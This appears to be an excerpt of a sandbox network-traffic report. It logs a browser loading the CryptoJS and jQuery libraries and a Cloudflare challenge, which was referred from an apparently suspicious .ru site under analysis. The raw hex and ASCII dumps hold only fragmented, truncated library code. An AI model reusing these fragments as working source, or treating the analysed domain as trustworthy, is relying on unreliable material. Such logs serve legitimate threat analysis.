                                                                          2025-01-14 21:50:27 UTC399INData Raw: 37 62 65 37 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                          Data Ascii: 7be7!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                          2025-01-14 21:50:27 UTC1369INData Raw: 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72
                                                                          Data Ascii: ned"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r
                                                                          2025-01-14 21:50:27 UTC1369INData Raw: 20 74 3d 6f 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e
                                                                          Data Ascii: t=o.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.
                                                                          2025-01-14 21:50:27 UTC1369INData Raw: 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28
                                                                          Data Ascii: string"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(
                                                                          2025-01-14 21:50:27 UTC1369INData Raw: 6f 6e 20 4e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e
                                                                          Data Ascii: on N(){for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>
                                                                          2025-01-14 21:50:27 UTC1369INData Raw: 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49
                                                                          Data Ascii: 7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I
                                                                          2025-01-14 21:50:27 UTC1369INData Raw: 72 61 79 28 74 2e 62 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b
                                                                          Data Ascii: ray(t.buffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={
                                                                          2025-01-14 21:50:27 UTC1369INData Raw: 6e 3b 76 61 72 20 6f 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45
                                                                          Data Ascii: n;var o=r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDE
                                                                          2025-01-14 21:50:27 UTC1369INData Raw: 37 32 39 36 2a 61 2e 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38
                                                                          Data Ascii: 7296*a.abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8
                                                                          2025-01-14 21:50:27 UTC1369INData Raw: 2c 79 2c 32 33 2c 41 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53
                                                                          Data Ascii: ,y,23,A[39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          10192.168.2.449757151.101.2.1374434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:27 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                          Host: code.jquery.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-01-14 21:50:27 UTC613INHTTP/1.1 200 OK
                                                                          Connection: close
                                                                          Content-Length: 89501
                                                                          Server: nginx
                                                                          Content-Type: application/javascript; charset=utf-8
                                                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                          ETag: "28feccc0-15d9d"
                                                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                          Access-Control-Allow-Origin: *
                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                          Via: 1.1 varnish, 1.1 varnish
                                                                          Accept-Ranges: bytes
                                                                          Date: Tue, 14 Jan 2025 21:50:27 GMT
                                                                          Age: 2375953
                                                                          X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740022-EWR
                                                                          X-Cache: HIT, HIT
                                                                          X-Cache-Hits: 2774, 3
                                                                          X-Timer: S1736891428.638394,VS0,VE0
                                                                          Vary: Accept-Encoding
                                                                          2025-01-14 21:50:27 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                          2025-01-14 21:50:27 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                          Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                          2025-01-14 21:50:27 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                          Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                          2025-01-14 21:50:27 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                          Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                          2025-01-14 21:50:27 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                          Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                          2025-01-14 21:50:27 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                          Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          11192.168.2.449758104.18.95.414434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:28 UTC793OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g5agr/0x4AAAAAAA2On-0a6Rkou75J/auto/fbE/normal/auto/ HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-Dest: iframe
                                                                          Referer: https://wv.bomirax.ru/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-01-14 21:50:28 UTC1362INHTTP/1.1 200 OK
                                                                          Date: Tue, 14 Jan 2025 21:50:28 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 26635
                                                                          Connection: close
                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                          content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                          cross-origin-embedder-policy: require-corp
                                                                          cross-origin-opener-policy: same-origin
                                                                          cross-origin-resource-policy: cross-origin
                                                                          origin-agent-cluster: ?1
